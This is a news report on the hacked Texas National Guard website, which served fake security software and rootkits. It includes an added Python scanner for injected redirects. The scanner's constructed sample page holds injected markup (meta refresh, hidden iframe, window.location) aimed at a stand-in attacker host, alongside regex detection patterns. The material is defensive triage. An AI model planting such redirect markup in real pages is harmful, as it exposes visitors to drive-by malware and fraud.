Attackers have hacked the website of the Texas National Guard and are using it to serve up offers of fake security software and plant rootkits on unpatched PCs, a security researcher said.
The Guard's site was hacked sometime before Wednesday, said Roger Thompson, the chief research officer of Czech Republic-based security vendor AVG Technologies. Thompson confirmed Thursday that the site was still pushing phony anti-spyware software and infecting users with a rootkit.
"It's still infective," Thompson said. "I did a refresh and [it] whacked me."
A spokeswoman for the Guard, Chief Master Sergeant Gonda Moncada, acknowledged the hack mid-day. "We are aware of the situation and are working hard to fix it," she said.
According to Thompson's original analysis, malicious code planted on the Guard site sends the visitor's browser to the hacker site. "[That's] probably in Russia," said Thompson, "[but I] can't confirm it, because the ISP for the host is not answering whois queries."
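The one technical fact the article gives is that code planted on the Guard's pages sends the visitor's browser to a third-party host. The quickest practitioner check for that, short of Thompson's "refresh and see what whacks me", is to fetch the page from an isolated machine and look for the usual carriers of such a redirect: hidden or off-site iframes, a meta refresh to another host, externally sourced scripts, and inline JavaScript that reassigns the page location. The scanner below is an added example, not AVG's tooling, Thompson's analysis, or anything recovered from the Guard site; the host names, the sample page and the specific indicator patterns are all constructed assumptions.

```python
"""Scan fetched HTML for injected markup that silently sends the browser to
another host.  Added example: not the Guard's page, AVG's tooling or Thompson's
analysis.  The attacker host, the sample page and the indicator patterns below
are constructed assumptions, not facts from the article."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline JavaScript that reassigns the page location (assumed pattern; one
# common way injected code redirects a visitor).
_LOCATION_RE = re.compile(
    r"(?:window|document|top|self)\.location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)
# Target of <meta http-equiv="refresh" content="0;url=...">.
_META_REFRESH_RE = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.IGNORECASE)


def _host(url):
    """Hostname of an absolute URL; '' for relative or empty values."""
    return (urlparse(url).hostname or "").lower()


def _is_hidden(attrs):
    """True for iframes sized to nothing or styled invisible/off-screen."""
    style = attrs.get("style", "").replace(" ", "").lower()
    width = attrs.get("width", "").lower().rstrip("px")
    height = attrs.get("height", "").lower().rstrip("px")
    return (
        width in ("0", "1") or height in ("0", "1")
        or "display:none" in style or "visibility:hidden" in style
        or "left:-" in style or "top:-" in style
    )


class _RedirectScanner(HTMLParser):
    """Collects redirect indicators while parsing; findings are dicts."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def _foreign(self, url):
        """True when url points at a host other than the page's own."""
        h = _host(url)
        return bool(h) and h != self.page_host and not h.endswith("." + self.page_host)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            if _is_hidden(a) or self._foreign(src):
                self.findings.append({"kind": "hidden-or-foreign-iframe", "target": src})
        elif tag == "script":
            self._in_script = True
            self._script_buf = []
            src = a.get("src", "")
            if src and self._foreign(src):
                self.findings.append({"kind": "foreign-script", "target": src})
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = _META_REFRESH_RE.search(a.get("content", ""))
            if m and self._foreign(m.group(1)):
                self.findings.append({"kind": "meta-refresh", "target": m.group(1)})

    def handle_data(self, data):
        # HTMLParser hands script bodies over as raw data before the end tag.
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            for m in _LOCATION_RE.finditer("".join(self._script_buf)):
                if self._foreign(m.group(1)):
                    self.findings.append({"kind": "inline-js-redirect", "target": m.group(1)})


def scan_page(html, page_host):
    """Return the list of redirect findings for a page served from page_host."""
    p = _RedirectScanner(page_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: a legitimate-looking page with three injected redirects.
SAMPLE_PAGE = """<html><head><title>Constructed sample page</title>
<meta http-equiv="refresh" content="0;url=http://attacker.example/landing">
<script src="/js/site.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://attacker.example/in.cgi?3" width="0" height="0"></iframe>
<script>window.location = "http://attacker.example/av/";</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE, "www.example-guard.org"):
        print(f["kind"], "->", f["target"])
```

A clean result is not proof that a site is clean: injected code of this kind is often obfuscated, served only to certain User-Agents or referrers, or added by a second-stage script, so treat this as a first triage pass and confirm, as Thompson did, by observing the actual browser behaviour from a disposable machine.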
The malicious site tries to trick users into forking over money for fake security software, said Thompson. "If you're not patched, when you close your browser, you find that your desktop has changed," he said, referring to a pop-up message that claims the user's PC is infected with spyware.
"This machine is now hopelessly nailed, and code has been installed in the background, and their pitch is that they'll remove it for a mere [US]$49.95, and insert your credit card number here, please," said Thompson.
In the background, the attackers also plant a rootkit: software that conceals the malware on the machine so that legitimate security software has a much harder time detecting and removing the attack code.
Moncada did not respond to other questions, including when the site would be cleansed of the malicious code and how it had got onto the site.